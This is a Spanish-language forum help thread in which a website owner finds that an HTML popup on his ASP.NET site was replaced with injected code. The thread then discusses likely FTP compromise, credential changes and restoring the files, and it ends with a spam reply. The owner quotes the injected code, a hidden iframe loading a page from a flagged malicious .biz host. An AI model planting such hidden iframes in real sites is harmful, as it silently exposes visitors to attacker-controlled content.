[SOLUCIONADO] Software malicioso en mi web

santayita · #1 (**permalink**) 12/05/2013, 16:37

Saludos,
No se muy bien donde colocar el tema, y con los nervios menos... disculpad. Si no va aqui, decirmelo y lo borro/muevo.

Me acaba de dar un error en Chrome, al tratar de abrir un link que tengo en mi web (asp.net) a un archivo .html que tengo a modo popup a traves de un javascript.
Algo me dice de software malintencionado del proveedor onlinebackupgrowing.biz
Alguno sabe de que se trata? Me podeis asesorar por favor?
GRACIAS

**El contenido del .html ha cambiado por un iframe

<h1>Please wait while GUI loads</h1>
<iframe src="http://onlinebackupgrowing.biz/selling/regulations-notes.php" style="display:none;"></iframe>

ArturoGallegos · #2 (**permalink**) 12/05/2013, 16:57

el sitio que mencionas online****.biz es tu sitio o lo estas enlazando?

si es de tu propiedad deberás revisar el archivo pertinente en busca de código (malicioso) que no deba estar allí.

por lo que se ve cualquier navegador decente te lo bloquea ya que fue reportado como atacante, generalmente es porque contienen viruz, spyware o algún tipo de código invasivo al usuario.

si el sitio no es tuyo simple y sencillo, ya no lo enlaces.

santayita · #3 (**permalink**) 12/05/2013, 17:19

Ni es mi sitio, ni tiene nada que ver comigo. Ese link enlaza a una pagina .html con una simple imagen, pero a traves del FTP he comprobado que el contenido de ese fichero a cambiado y es un iframe con codigo de ese sitio del que hablamos en vez de la imagen...
obviamente yo no lo he cambiado... significa eso que alguien tiene acceso a mi FTP!!??

ArturoGallegos · #4 (**permalink**) 12/05/2013, 18:09

es muy posible, lo recomendable es corregir ese problema y actualizar tus datos de ftp.

utiliza nombre y usuario difíciles de adivinar al menos alfanumérico de 8 dígitos, si puedes agregar símbolos mejor, si no has compartido tu ftp con alguien mas ni lo has utilizado en un lugar publico (cibercafe u otro), también te recomendaría revisar tu maquina en busca de keylogger, virus o similares.

webosiris · #5 (**permalink**) 12/05/2013, 22:14

probablemente la programación de tu web tenga algún tipo de error y te hayan hecho algún tipo de exploit.

Si estás usando un CMS, revisa que esté actualizado.
Si es programación propia... ahí no te puedo ayudar porque no conozco .net

santayita · #6 (**permalink**) 19/05/2013, 08:04

Muchas gracias.
He reemplazado los ficheros por los originales y todo Ok! El ataque creo que fue desde un .JS... Esperemos no vuelva a suceder.

sirmons · #7 (**permalink**) 02/09/2013, 00:37

Mi sitio favorito! Acerca camisa del fútbo [URL="http://www.futbolcfb.com/"]http://www.futbolcfb.com/[/URL]

lauser · #8 (**permalink**) 02/09/2013, 01:17

Cita:

Iniciado por sirmons

Mi sitio favorito! Acerca camisa del fútbo [URL="http://www.futbolcfb.com/"]http://www.futbolcfb.com/[/URL]

Esto... que pinta en este hilo?